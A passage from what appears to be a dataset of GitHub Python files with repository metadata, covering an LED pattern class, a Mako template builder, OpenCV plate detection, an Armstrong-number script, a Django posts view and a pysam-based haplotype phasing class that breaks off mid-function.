drop_colour\n\n\nclass RainColourWaves(RainWaves):\n name = \"Rain Colour Waves\"\n transition_len = 0\n pattern_len = 8000\n\n def __init__(self):\n super().__init__(rainbow=False)\n\n\nclass RainbowWaves(RainWaves):\n name = \"Rainbow Waves\"\n transition_len = 0\n pattern_len = 8000\n\n def __init__(self):\n super().__init__(rainbow=True)\n","repo_name":"cillian64/bitstream","sub_path":"software/playlist/rain_colour_waves.py","file_name":"rain_colour_waves.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36225465247","text":"import os\n\nfrom pydmt.api.feature import Feature\nfrom pydmt.builders.mako import BuilderMako\nfrom pydmt.core.pydmt import PyDMT\nfrom pydmt.utils.filesystem import files_under_folder\n\n\nclass FeatureMako(Feature):\n def __init__(\n self,\n data=None,\n templates_folder: str = \"templates\",\n config_folder: str = \"config\",\n snipplet_folder: str = \"snipplets\",\n ):\n self.data = data\n self.templates_folder = templates_folder\n self.config_folder = config_folder\n self.snipplet_folder = snipplet_folder\n\n def setup(self, pydmt: PyDMT) -> None:\n if not os.path.isdir(self.templates_folder):\n return\n for root, _, filenames in os.walk(self.templates_folder):\n for filename in filenames:\n source = os.path.join(root, filename)\n target_base, ext = os.path.splitext(source)\n if ext == '.mako':\n target = os.sep.join(target_base.split(os.sep)[1:])\n builder = BuilderMako(\n source=source,\n target=target,\n data=self.data,\n config_files=files_under_folder(self.config_folder, suffix=\".py\"),\n snipplet_files=files_under_folder(self.snipplet_folder, suffix=\".mako\"),\n )\n pydmt.add_builder(builder)\n","repo_name":"veltzer/pydmt","sub_path":"pydmt/features/mako.py","file_name":"mako.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"10048201094","text":"import cv2\nimport numpy as np\n\n\"\"\"霍夫圆检测,放弃:圆柱是固定的,不需要检测\ndef circles_det(img):\n h = img.shape[0]\n w = img.shape[1]\n if h * w > 6000:\n dp = 1\n else:\n dp = 2 # 分辨率不足时,提高dp参数阈值\n d = (int)(w / 2) # d表示检测到的圆心之间的最小距离\n r_min = (int)((w / 4.2) / 2) # 最小半径\n r_max = (int)((w / 3.2) / 2) # 最大半径\n\n # 灰度化\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # 形态学腐蚀\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n gray = cv2.morphologyEx(gray, cv2.MORPH_OPEN, kernel, iterations=3)\n\n gray = cv2.medianBlur(gray, 5)\n # ret, th1 = 
cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n    th2 = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 3, 5)\n    # th3 = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 3, 5)\n\n    kernel = np.ones((5, 5), np.uint8)\n    erosion = cv2.erode(th2, kernel, iterations=1)\n    # dilation = cv2.dilate(erosion, kernel, iterations=1)\n\n    # edge detection\n    imgray = cv2.Canny(erosion, 30, 100)\n\n    # Hough circle detection\n    circles = cv2.HoughCircles(imgray, cv2.HOUGH_GRADIENT, dp, d, param1=100, param2=5, minRadius=r_min,\n                               maxRadius=r_max)\n    try:\n        circles = np.uint16(np.around(circles))\n    except TypeError:\n        print(\"No circles detected!\")\n        return -1\n\n    # draw the circles\n    count = 0\n    for i in circles[0, :]:\n        # draw the outer circle\n        cv2.circle(img, (i[0], i[1]), i[2], (0, 255, 0), 1)\n        # draw the center of the circle\n        cv2.circle(img, (i[0], i[1]), 1, (0, 0, 255), 1)\n        count = count + 1\n        if count >= 2:\n            break\n\n    return circles[0]\n\"\"\"\n\n\ndef plate_det(img):\n    # convert to grayscale\n    try:\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    except Exception:\n        print(\"Invalid image\")\n        exit()\n\n    # get the image dimensions\n    h = img.shape[0]\n    w = img.shape[1]\n    # bounds of the detection region\n    top = int(h * 2 / 5)\n    bottom = int(h / 2)\n    left = int(w / 2)\n    right = int(w)\n    cv2.rectangle(img, (left, top), (right, bottom), (0, 0, 255), 1)\n\n    # edge detection\n    try:\n        edges = cv2.Canny(gray, 50, 200)\n    except Exception:\n        print(\"Edge detection failed\")\n        exit()\n\n    minLineLength = w / 10  # minimum line segment length\n    if h * w > 6000:\n        maxLineGap = 5  # maximum allowed gap within one segment; beyond this it is treated as two segments\n    else:\n        maxLineGap = 1\n    # line detection\n    try:\n        lines = cv2.HoughLinesP(edges, 1, np.pi / 180, 10, minLineLength, maxLineGap)\n    except Exception:\n        print(\"Line detection failed\")\n        exit()\n\n    # iterate over the detected segments; return 1 if any segment lies within the target region\n    count = 0\n    for i in range(len(lines)):\n        for x1, y1, x2, y2 in lines[i]:\n            cv2.line(img, (x1, y1), (x2, y2), (i * 20, 100 + i * 20, 255), 1)\n            if left < x1 < right and top < y1 < bottom or left < x2 < right and top < y2 < bottom:\n                cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 1)\n                count = count + 1\n    # print(\"count:\", count)\n    if count > 1:\n        return 1\n    return 0\n","repo_name":"Llixin/plate_detection","sub_path":"plate_det.py","file_name":"plate_det.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"19082837783","text":"n = int(input(\"Enter a number: \"))\nsum = 0\norder = len(str(n))\noriginal_n = n\n\nwhile (n>0):\n    digit = n%10 # take the last digit\n    sum += digit ** order # raise it to the power of the digit count and accumulate\n    n = n // 10 # remove the last digit until the number becomes 0\n\nif (sum == original_n):\n    print(f\"{original_n} is an Armstrong number\")\nelse: \n    print(f\"{original_n} is not an Armstrong number\")\n\n","repo_name":"Bilal-Sheikh/PythonPrograms","sub_path":"Armstrong.py","file_name":"Armstrong.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34892583786","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse\nfrom django.db import IntegrityError\nfrom ..models import *\nfrom ..constants import *\nfrom ..serializers import *\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n# Lists all posts of a user\nclass myPosts(APIView):\n    # GET request\n    def get(self, request):\n        username = request.GET.get(username_param)\n        try:\n            u = UserProfile.objects.get(username=username)\n            reviews = Review.objects.filter(userID=u)\n            polls = 
Poll.objects.filter(userID=u)\n\n topicData = {}\n for review in reviews:\n t = Topic.objects.get(pk=review.topicID.pk)\n topicData[t.pk] = t.title\n\n pcData = {}\n for poll in polls:\n pc = PollChoice.objects.filter(pollID=poll)\n pcSerializer = PollChoiceSerializer(pc, many=True)\n pcData[poll.pk] = pcSerializer.data\n\n reviewsSerializer = ReviewSerializer(reviews, many=True)\n pollsSerializer = PollSerializer(polls, many=True)\n response = reviewsSerializer.data + pollsSerializer.data\n return JsonResponse({'status': 200, 'topicID': topicData, 'reviews': reviewsSerializer.data,\n 'polls': pollsSerializer.data, 'pc': pcData }, safe=False)\n # response = reviewsSerializer.data + pollsSerializer.data\n # return JsonResponse({'all': response}, safe=False)\n\n # Alternative code:\n # reviewsSerializer = ReviewSerializer(reviews, many=True)\n # pollsSerializer = PollSerializer(polls, many=True)\n # response = reviewsSerializer.data + pollsSerializer.data\n # return Response(response)\n\n # Data already exists\n except IntegrityError:\n return JsonResponse(UNIQUE_400, status=400)\n\n # User does not exist\n except ObjectDoesNotExist:\n return JsonResponse(USER_400, status=400)\n\n # POST request\n def post(self, request):\n return JsonResponse(GET_400, status=400)\n\n# https://stackoverflow.com/a/23788795","repo_name":"apregoe/knowItAllService","sub_path":"knowItAllService/knowItAllAPI/myPosts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"72511683110","text":"# paraphase\n# Author: Xiao Chen \n\n\nimport pysam\nimport os\nimport copy\nimport numpy as np\nfrom collections import Counter\nimport re\nimport logging\nfrom scipy.stats import poisson\nfrom collections import namedtuple\nfrom .haplotype_assembler import VariantGraph\n\n\nclass Phaser:\n clip_5p = r\"^\\d+S|^\\d+H\"\n clip_3p = r\"\\d+S$|\\d+H$\"\n deletion = r\"\\d+D\"\n fields = [\n \"total_cn\",\n \"gene_cn\",\n \"final_haplotypes\",\n \"two_copy_haplotypes\",\n \"alleles_final\",\n \"hap_links\",\n \"highest_total_cn\",\n \"assembled_haplotypes\",\n \"sites_for_phasing\",\n \"unique_supporting_reads\",\n \"het_sites_not_used_in_phasing\",\n \"homozygous_sites\",\n \"haplotype_details\",\n \"variant_genotypes\",\n \"nonunique_supporting_reads\",\n \"read_details\",\n \"genome_depth\",\n ]\n GeneCall = namedtuple(\n \"GeneCall\",\n fields,\n defaults=(None,) * len(fields),\n )\n MEAN_BASE_QUAL = 25\n\n def __init__(\n self,\n sample_id,\n outdir,\n wgs_depth=None,\n genome_bam=None,\n sample_sex=None,\n ):\n self.outdir = outdir\n self.sample_id = sample_id\n self.homopolymer_sites = {}\n self.het_sites = [] # for phasing\n self.het_no_phasing = []\n self.homo_sites = []\n self.candidate_pos = set()\n self.mdepth = wgs_depth\n self.genome_bam = genome_bam\n self.sample_sex = sample_sex\n\n def set_parameter(self, config):\n self.gene = config[\"gene\"]\n self.bam = os.path.join(\n self.outdir, self.sample_id + f\"_{self.gene}_realigned.bam\"\n )\n if os.path.exists(self.bam) is False:\n raise Exception(f\"File {self.bam} not found.\")\n self._bamh = pysam.AlignmentFile(self.bam, \"rb\")\n self.nchr = config[\"nchr\"]\n self.ref = config[\"data\"][\"reference\"]\n self._refh = pysam.FastaFile(self.ref)\n self.left_boundary = config.get(\"left_boundary\")\n self.right_boundary = config.get(\"right_boundary\")\n self.pivot_site = None\n if \"pivot_site\" in config:\n self.pivot_site = 
config[\"pivot_site\"]\n self.nchr_old = config[\"nchr_old\"]\n self.offset = int(self.nchr_old.split(\"_\")[1]) - 1\n if self.left_boundary is None:\n self.left_boundary = int(self.nchr_old.split(\"_\")[1])\n if self.right_boundary is None:\n self.right_boundary = int(self.nchr_old.split(\"_\")[2])\n self.use_supplementary = False\n if \"use_supplementary\" in config:\n self.use_supplementary = config[\"use_supplementary\"]\n self.to_phase = False\n if \"to_phase\" in config:\n self.to_phase = config[\"to_phase\"]\n self.is_reverse = False\n if \"is_reverse\" in config:\n self.is_reverse = config[\"is_reverse\"]\n self.clip_3p_positions = []\n self.clip_5p_positions = []\n if \"clip_3p_positions\" in config:\n self.clip_3p_positions = config[\"clip_3p_positions\"]\n if \"clip_5p_positions\" in config:\n self.clip_5p_positions = config[\"clip_5p_positions\"]\n self.noisy_region = []\n if \"noisy_region\" in config:\n self.noisy_region = config[\"noisy_region\"]\n\n def get_regional_depth(self, bam_handle, query_region, ninterval=100):\n \"\"\"Get depth of the query regions\"\"\"\n region_depth = []\n for region in query_region:\n depth = []\n nstep = max(1, int((region[1] - region[0]) / ninterval))\n for pos in range(region[0], region[1], nstep):\n site_depth = bam_handle.count(\n self.nchr, pos - 1, pos, read_callback=\"all\"\n )\n depth.append(site_depth)\n region_depth.append(np.median(depth))\n return region_depth\n\n def check_coverage_before_analysis(self):\n \"\"\"check low coverage regions for enrichment data\"\"\"\n region_depth = self.get_regional_depth(\n self._bamh, [[self.left_boundary, self.right_boundary]]\n )[0]\n if np.isnan(region_depth) or region_depth < 10:\n logging.warning(\n \"This region does not appear to have coverage. Will not attempt to phase haplotypes.\"\n )\n return False\n return True\n\n def get_homopolymer(self):\n \"\"\"Get the homopolymer sites\"\"\"\n seq = self._refh.fetch(self.nchr_old).upper()\n nstart = self.offset\n exclude = {}\n for i in range(len(seq) - 5):\n for nu in [\"A\", \"C\", \"G\", \"T\"]:\n if seq[i : i + 5].count(nu) >= 5:\n for pos in range(i + nstart, i + 7 + nstart):\n exclude.setdefault(pos, [])\n # position before homopolymer\n if seq[i - 1] != nu:\n exclude[i + nstart].append(nu)\n exclude[i + 1 + nstart] = [\"A\", \"C\", \"G\", \"T\"]\n # position after homopolymer\n if seq[i + 5] != nu:\n exclude[i + 6 + nstart].append(nu)\n exclude[i + 6 + nstart].append(\"1\")\n exclude = dict(sorted(exclude.items()))\n for pos in exclude:\n bases = \",\".join(list(set(exclude[pos])))\n if exclude[pos] == []:\n bases = \"0\"\n self.homopolymer_sites.setdefault(pos, bases)\n\n @staticmethod\n def depth_prob(nread, haploid_depth):\n \"\"\"Find probability of cn state based on depth\"\"\"\n prob = []\n for i in range(4):\n depthexpected = (i + 1) * haploid_depth\n pmf = poisson.pmf(nread, depthexpected)\n prob.append(pmf)\n sum_prob = sum(prob)\n if sum_prob == 0:\n return None\n post_prob = [float(a) / float(sum_prob) for a in prob]\n return post_prob\n\n @staticmethod\n def check_del(read, del_size):\n \"\"\"Find reads having the 6.3kb deletion in its cigar string\"\"\"\n del_len = [int(a[:-1]) for a in re.findall(Phaser.deletion, read.cigarstring)]\n if del_len != [] and abs(max(del_len) - del_size) < 50:\n return True\n return False\n\n def get_long_del_reads(\n self,\n p3_pos1,\n p3_pos2,\n p5_pos1,\n p5_pos2,\n del_size,\n min_clip_len=300,\n min_extend=1000,\n ):\n \"\"\"\n Find reads having big deletions. 
(Improve to general SVs for future)\n Could be softclipped at either side or have the deletion in cigar.\n Parameters:\n min_clip_len (int): minimum length for the soft-clip\n Returns: fully-spanning reads (set), partially spanning reads (set)\n \"\"\"\n bamh = self._bamh\n p5_reads = set()\n p3_reads = set()\n del_reads = set()\n # 3 prime clip\n pos1 = p3_pos1\n pos2 = p3_pos2\n reference_start_cutoff = pos1 - min_extend\n for read in bamh.fetch(self.nchr, pos1, pos2):\n read_name = self.get_read_name(read)\n find_clip_3p = re.findall(self.clip_3p, read.cigarstring)\n if find_clip_3p != [] and pos1 < read.reference_end < pos2:\n if (\n int(find_clip_3p[0][:-1]) >= min_clip_len\n and read.reference_start < reference_start_cutoff\n ):\n p3_reads.add(read_name)\n if self.check_del(read, del_size):\n del_reads.add(read_name)\n # 5 prime clip\n pos1 = p5_pos1\n pos2 = p5_pos2\n reference_end_cutoff = pos2 + min_extend\n for read in bamh.fetch(self.nchr, pos1, pos2):\n read_name = self.get_read_name(read)\n find_clip_5p = re.findall(self.clip_5p, read.cigarstring)\n if find_clip_5p != [] and pos1 < read.reference_start < pos2:\n if (\n int(find_clip_5p[0][:-1]) >= min_clip_len\n and read.reference_end > reference_end_cutoff\n ):\n p5_reads.add(read_name)\n if self.check_del(read, del_size):\n del_reads.add(read_name)\n if del_reads != set() or (p3_reads != set() and p5_reads != set()):\n return (\n del_reads.union(p3_reads.intersection(p5_reads)),\n del_reads.union(p3_reads).union(p5_reads),\n )\n return set(), set()\n\n def get_pivot_site_index(self):\n \"\"\"Return the index of the pivot site in list of het sites\"\"\"\n positions = [int(site.split(\"_\")[0]) for site in self.het_sites]\n if self.pivot_site in positions:\n return positions.index(self.pivot_site), True\n return -1, False\n\n def get_read_name(self, read):\n \"\"\"Rename reads when supplementary\"\"\"\n read_name = read.query_name\n if read.is_supplementary and self.use_supplementary:\n read_name = (\n read_name + f\"_sup_{read.reference_start}_{read.reference_length}\"\n )\n return read_name\n\n def get_read_names(self, read, partial_deletion_reads):\n \"\"\"Add read names for supplementary alignments\"\"\"\n read_names = [read.query_name]\n if read.is_supplementary and self.use_supplementary:\n sup_name = (\n read.query_name + f\"_sup_{read.reference_start}_{read.reference_length}\"\n )\n read_names = [sup_name]\n if (\n sup_name in partial_deletion_reads\n and read.query_name in partial_deletion_reads\n ):\n read_names.append(read.query_name)\n return read_names\n\n def get_haplotypes_from_reads(\n self,\n exclude_reads=[],\n min_mapq=5,\n min_clip_len=50,\n check_clip=False,\n partial_deletion_reads=[],\n kept_sites=[],\n add_sites=[],\n ):\n \"\"\"\n Go through reads and get bases at sites of interest.\n Two rounds, with variant site filtering in between.\n \"\"\"\n raw_read_haps = self.get_haplotypes_from_reads_step(\n exclude_reads,\n min_mapq,\n min_clip_len,\n check_clip,\n partial_deletion_reads,\n )\n self.remove_var(raw_read_haps, kept_sites)\n if self.het_sites != []:\n for var in add_sites:\n if var not in self.het_sites:\n self.het_sites.append(var)\n self.het_sites = sorted(self.het_sites)\n raw_read_haps = self.get_haplotypes_from_reads_step(\n exclude_reads,\n min_mapq,\n min_clip_len,\n check_clip,\n partial_deletion_reads,\n )\n return raw_read_haps\n\n def get_haplotypes_from_reads_step(\n self,\n exclude_reads=[],\n min_mapq=5,\n min_clip_len=50,\n check_clip=False,\n partial_deletion_reads=[],\n ):\n 
\"\"\"\n Go through reads and get bases at sites of interest\n Returns:\n read_haps (dict of str:list): collapse each read into just the positions\n of interest. 1 corresponds to ref, 2 corresponds to alt\n \"\"\"\n het_sites = self.het_sites\n read_haps = {}\n nvar = len(het_sites)\n for dsnp_index, allele_site in enumerate(het_sites):\n snp_position_gene1, allele1, allele2, *at = allele_site.split(\"_\")\n snp_position = int(snp_position_gene1)\n reads_with_flanking_indels = []\n for pileupcolumn in self._bamh.pileup(\n self.nchr,\n snp_position - 2,\n snp_position,\n truncate=True,\n min_base_quality=self.MEAN_BASE_QUAL,\n ):\n # require that the base on the read is not flanked by any indels\n if pileupcolumn.reference_pos == snp_position - 2:\n for read in pileupcolumn.pileups:\n if read.indel != 0 or read.is_del:\n read_names = self.get_read_names(\n read.alignment, partial_deletion_reads\n )\n for read_name in read_names:\n reads_with_flanking_indels.append(read_name)\n if pileupcolumn.reference_pos == snp_position - 1:\n for read in pileupcolumn.pileups:\n read_names = self.get_read_names(\n read.alignment, partial_deletion_reads\n )\n for read_name in read_names:\n if (\n not read.is_del\n and not read.is_refskip\n and not read.alignment.is_secondary\n and read.alignment.mapping_quality >= min_mapq\n and read_name not in exclude_reads\n and read.indel == 0\n and read_name not in reads_with_flanking_indels\n ):\n read_seq = read.alignment.query_sequence\n start_pos = read.query_position\n end_pos = start_pos + 1\n if end_pos < len(read_seq):\n hap = read_seq[start_pos:end_pos]\n if read_name not in read_haps:\n read_haps.setdefault(read_name, [\"x\"] * nvar)\n if hap.upper() == allele1.upper():\n read_haps[read_name][dsnp_index] = \"1\"\n elif hap.upper() == allele2.upper():\n read_haps[read_name][dsnp_index] = \"2\"\n\n # for softclips starting at a predefined position, mark sites as 0 instead of x\n if check_clip:\n for dsnp_index, allele_site in enumerate(het_sites):\n snp_position_gene1, allele1, allele2, *at = allele_site.split(\"_\")\n snp_position = int(snp_position_gene1)\n for clip_position in sorted(self.clip_3p_positions):\n if snp_position > clip_position:\n for read in self._bamh.fetch(\n self.nchr, clip_position - 10, clip_position + 10\n ):\n read_name = self.get_read_name(read)\n if read_name not in read_haps:\n read_haps.setdefault(read_name, [\"x\"] * nvar)\n if abs(read.reference_end - clip_position) < 20:\n find_clip_3p = re.findall(\n self.clip_3p, read.cigarstring\n )\n if (\n find_clip_3p != []\n and int(find_clip_3p[0][:-1]) >= min_clip_len\n ):\n read_haps[read_name][dsnp_index] = \"0\"\n for clip_position in sorted(self.clip_5p_positions, reverse=True):\n if snp_position < clip_position:\n for read in self._bamh.fetch(\n self.nchr, clip_position - 10, clip_position + 10\n ):\n read_name = self.get_read_name(read)\n if read_name not in read_haps:\n read_haps.setdefault(read_name, [\"x\"] * nvar)\n if abs(read.reference_start - clip_position) < 20:\n find_clip_5p = re.findall(\n self.clip_5p, read.cigarstring\n )\n if (\n find_clip_5p != []\n and int(find_clip_5p[0][:-1]) >= min_clip_len\n ):\n read_haps[read_name][dsnp_index] = \"0\"\n return read_haps\n\n def remove_var(self, raw_read_haps, kept_sites):\n \"\"\"remove variants that are not present after checking each read-haplotype\"\"\"\n bases_per_site = {}\n sites_to_remove = []\n for i in range(len(self.het_sites)):\n for read, hap in raw_read_haps.items():\n base = hap[i]\n bases_per_site.setdefault(i, 
[]).append(base)\n\n for pos in bases_per_site:\n bases = bases_per_site[pos]\n bases_x = bases.count(\"x\")\n bases_ref = bases.count(\"1\")\n bases_alt = bases.count(\"2\")\n this_var = self.het_sites[pos]\n if bases_x == len(bases):\n sites_to_remove.append(this_var)\n elif bases_ref + bases_alt == len(bases) - bases_x and bases_alt <= 3:\n if this_var not in kept_sites:\n sites_to_remove.append(this_var)\n for var in sites_to_remove:\n if var in self.het_sites:\n self.het_sites.remove(var)\n\n def allow_del_bases(self, pos):\n return False\n\n def process_indel(self, pos, ref_seq, var_seq):\n \"\"\"Translate pysam indel seq into real sequence\"\"\"\n if \"+\" in var_seq:\n ins_base = var_seq.split(re.findall(r\"\\+\\d+\", var_seq)[0])[1]\n indel_size = len(ins_base)\n var_seq = ref_seq + ins_base\n else:\n del_len = int(re.findall(r\"\\-\\d+\", var_seq)[0][1:])\n indel_size = del_len\n var_seq = ref_seq\n offset_pos = pos - self.offset\n ref_seq = self._refh.fetch(\n self.nchr_old,\n offset_pos - 1,\n offset_pos + del_len,\n )\n return ref_seq, var_seq, indel_size\n\n def get_candidate_pos(self, regions_to_check=[], min_read_support=5, min_vaf=0.11):\n \"\"\"\n Get all polymorphic sites in the region, update self.candidate_pos\n \"\"\"\n bamh = self._bamh\n pileups_raw = {}\n for pileupcolumn in bamh.pileup(\n self.nchr,\n self.left_boundary,\n self.right_boundary,\n truncate=True,\n ):\n pos = pileupcolumn.pos + 1\n pileups_raw.setdefault(\n pos,\n [a.upper() for a in pileupcolumn.get_query_sequences(add_indels=True)],\n )\n variants = {}\n variants_no_phasing = {}\n for pos in pileups_raw:\n all_bases = pileups_raw[pos]\n total_depth = len(all_bases)\n del_bases_count = all_bases.count(\"*\")\n # get reference base\n offset_pos = pos - self.offset\n ref_seq_genome = self._refh.fetch(self.nchr_old, offset_pos - 1, offset_pos)\n\n if total_depth >= min_read_support and (\n del_bases_count < min_read_support or self.allow_del_bases(pos)\n ):\n all_bases = [a for a in all_bases if a != \"*\"]\n counter = Counter(all_bases)\n # include multi-allelic sites\n bases = counter.most_common(3)\n # homozygous\n if len(counter) == 1 or (\n len(counter) >= 2\n and bases[0][1] > len(all_bases) - min_read_support\n ):\n var_seq = bases[0][0]\n ref_seq = ref_seq_genome\n if var_seq != ref_seq:\n # SNV and indels\n if \"-\" not in var_seq and \"+\" not in var_seq:\n # \"homo\" sites in large deletions should be put back into het sites\n if (\n self.allow_del_bases(pos)\n and del_bases_count >= min_read_support\n and pos not in self.homopolymer_sites\n ):\n variants.setdefault(pos, []).append((ref_seq, var_seq))\n elif pos not in self.homopolymer_sites or (\n pos in self.homopolymer_sites\n and var_seq\n not in self.homopolymer_sites[pos].split(\",\")\n ):\n self.homo_sites.append(f\"{pos}_{ref_seq}_{var_seq}\")\n elif pos not in self.homopolymer_sites:\n ref_seq, var_seq, indel_size = self.process_indel(\n pos, ref_seq, var_seq\n )\n if indel_size < 25:\n self.homo_sites.append(f\"{pos}_{ref_seq}_{var_seq}\")\n elif len(counter) >= 2:\n found_ref = ref_seq_genome in [a[0] for a in bases]\n if found_ref:\n for var_seq, var_count in bases:\n ref_seq = ref_seq_genome\n if (\n var_seq != ref_seq\n and var_count >= min_read_support\n and var_count / total_depth > min_vaf\n ):\n # SNV\n if \"-\" not in var_seq and \"+\" not in var_seq:\n if pos not in self.homopolymer_sites:\n variants.setdefault(pos, []).append(\n (ref_seq, var_seq)\n )\n else:\n prohibited_bases = self.homopolymer_sites[\n pos\n 
].split(\",\")\n if var_seq not in prohibited_bases:\n if \"1\" in prohibited_bases:\n variants.setdefault(pos, []).append(\n (ref_seq, var_seq)\n )\n else:\n variants_no_phasing.setdefault(\n pos, (ref_seq, var_seq)\n )\n # indels\n elif pos not in self.homopolymer_sites:\n ref_seq, var_seq, indel_size = self.process_indel(\n pos, ref_seq, var_seq\n )\n if indel_size < 25:\n variants_no_phasing.setdefault(\n pos, (ref_seq, var_seq)\n )\n\n # exclude variants caused by shifted softclips of the big deletions\n excluded_variants = []\n for region in regions_to_check:\n var_to_check = [a for a in variants if region[0] < a < region[1]]\n excluded_variants += var_to_check\n for pos in variants:\n # for now, filter out multi-allelic sites\n if pos not in excluded_variants and len(variants[pos]) == 1:\n ref_seq, var_seq = variants[pos][0]\n self.candidate_pos.add(f\"{pos}_{ref_seq}_{var_seq}\")\n\n excluded_variants = []\n for region in regions_to_check:\n var_to_check = [a for a in variants_no_phasing if region[0] < a < region[1]]\n excluded_variants += var_to_check\n for pos in variants_no_phasing:\n if pos not in excluded_variants:\n ref_seq, var_seq = variants_no_phasing[pos]\n self.het_no_phasing.append(f\"{pos}_{ref_seq}_{var_seq}\")\n\n def remove_noisy_sites(self):\n \"\"\"remove variants in predefined noisy sites\"\"\"\n problematic_sites = []\n for site in self.het_sites:\n for region in self.noisy_region:\n if region[0] <= int(site.split(\"_\")[0]) <= region[1]:\n problematic_sites.append(site)\n for site in problematic_sites:\n self.het_sites.remove(site)\n\n @staticmethod\n def simplify_read_haps(read_haps):\n \"\"\"Simplify read haplotypes for output\"\"\"\n haplotypes_to_reads = {}\n reads_to_haplotypes = {}\n for read in read_haps:\n hap = read_haps[read]\n haplotypes_to_reads.setdefault(\"\".join(hap), []).append(read)\n reads_to_haplotypes.setdefault(read, \"\".join(hap))\n return haplotypes_to_reads, reads_to_haplotypes\n\n def check_variants_in_haplotypes(self, variant):\n \"\"\"\n For variants not used in phasing, check which haplotypes they are in.\n \"\"\"\n dreads = {}\n var_pos, ref, alt = variant.split(\"_\")\n var_pos = int(var_pos)\n var_size = len(alt) - len(ref)\n if var_size < 0:\n indel_N = \"N\" * abs(var_size)\n indel_base_in_read = f\"{ref[0]}{var_size}{indel_N}\"\n elif var_size > 0:\n indel_base_in_read = f\"{ref[0]}+{var_size}{alt[1:]}\"\n ref_base = ref[0]\n alt_base = alt[0] if var_size == 0 else indel_base_in_read\n for pileupcolumn in self._bamh.pileup(\n self.nchr,\n var_pos - 1,\n var_pos,\n truncate=True,\n ):\n read_names = pileupcolumn.get_query_names()\n bases = [\n a.upper() for a in pileupcolumn.get_query_sequences(add_indels=True)\n ]\n for i, read in enumerate(read_names):\n if bases[i] == ref_base:\n dreads.setdefault(read, \"ref\")\n elif bases[i] == alt_base:\n dreads.setdefault(read, \"alt\")\n else:\n dreads.setdefault(read, \".\")\n return dreads\n\n @staticmethod\n def get_start_end(hap):\n \"\"\"get range of positions that are not x\"\"\"\n haplen = len(hap)\n for nstart, base in enumerate(hap):\n if base != \"x\":\n break\n for nend in reversed(range(haplen)):\n if hap[nend] != \"x\":\n break\n return nstart, nend\n\n def get_hap_variant_ranges(self, hap):\n \"\"\"get boundaries of (partial) haplotypes\"\"\"\n nstart, nend = self.get_start_end(hap)\n if nstart == 0:\n nstart_previous_pos = self.left_boundary\n else:\n nstart_previous = nstart - 1\n nstart_previous_pos = int(self.het_sites[nstart_previous].split(\"_\")[0]) + 1\n if nend 
== len(hap) - 1:\n nend_next_pos = self.right_boundary\n else:\n nend_next = nend + 1\n nend_next_pos = int(self.het_sites[nend_next].split(\"_\")[0]) - 1\n return nstart_previous_pos, nend_next_pos\n\n def output_variants_in_haplotypes(self, haps, reads, nonunique, two_cp_haps=[]):\n \"\"\"\n Summarize all variants in each haplotype.\n Output all variants and their genotypes.\n Haplotypes are different length, so a range (boundary) is reported\n \"\"\"\n het_sites = self.het_sites\n haplotype_variants = {}\n haplotype_info = {}\n dvar = {}\n var_no_phasing = copy.deepcopy(self.het_no_phasing)\n for hap, hap_name in haps.items():\n haplotype_variants.setdefault(hap_name, [])\n # het sites not used in phasing\n if reads != {}:\n for var in var_no_phasing:\n genotypes = []\n var_reads = self.check_variants_in_haplotypes(var)\n haps_with_variant = []\n for hap, hap_name in haps.items():\n hap_reads = reads[hap]\n hap_reads_nonunique = [a for a in nonunique if hap in nonunique[a]]\n genotype = self.get_genotype_in_hap(\n var_reads, hap_reads, hap_reads_nonunique\n )\n genotypes.append(genotype)\n if genotype == \"1\":\n haps_with_variant.append(hap_name)\n if haps_with_variant == []:\n self.het_no_phasing.remove(var)\n else:\n for hap_name in haps_with_variant:\n haplotype_variants[hap_name].append(var)\n dvar.setdefault(var, genotypes)\n # het sites and homo sites\n for hap, hap_name in haps.items():\n for i in range(len(hap)):\n if hap[i] == \"2\":\n haplotype_variants[hap_name].append(het_sites[i])\n # need some coordinate check if there is long deletion\n haplotype_variants[hap_name] += self.homo_sites\n\n var_nstart, var_nend = self.get_hap_variant_ranges(hap)\n var_tmp = haplotype_variants[hap_name]\n var_tmp1 = [\n a for a in var_tmp if var_nstart <= int(a.split(\"_\")[0]) <= var_nend\n ]\n var_tmp1 = list(set(var_tmp1))\n var_tmp2 = sorted(var_tmp1, key=lambda x: int(x.split(\"_\")[0]))\n haplotype_info.setdefault(\n hap_name, {\"variants\": var_tmp2, \"boundary\": [var_nstart, var_nend]}\n )\n\n # summary per variant\n all_haps = haps\n nhap = len(all_haps)\n for var in self.homo_sites:\n dvar.setdefault(var, [\"1\"] * nhap)\n for i, var in enumerate(het_sites):\n dvar.setdefault(var, [])\n for hap, hap_name in haps.items():\n base_call = \".\"\n if hap[i] == \"2\":\n base_call = \"1\"\n elif hap[i] == \"1\":\n base_call = \"0\"\n dvar[var].append(base_call)\n if hap_name in two_cp_haps:\n dvar[var].append(base_call)\n\n return haplotype_info, {\n var: \"|\".join(dvar[var]) for var in dict(sorted(dvar.items()))\n }\n\n def get_genotype_in_hap(self, var_reads, hap_reads, hap_reads_nonunique):\n \"\"\"For a given variant, return its status in a haplotype\"\"\"\n hap_reads_contain_var = [var_reads[a] for a in hap_reads if a in 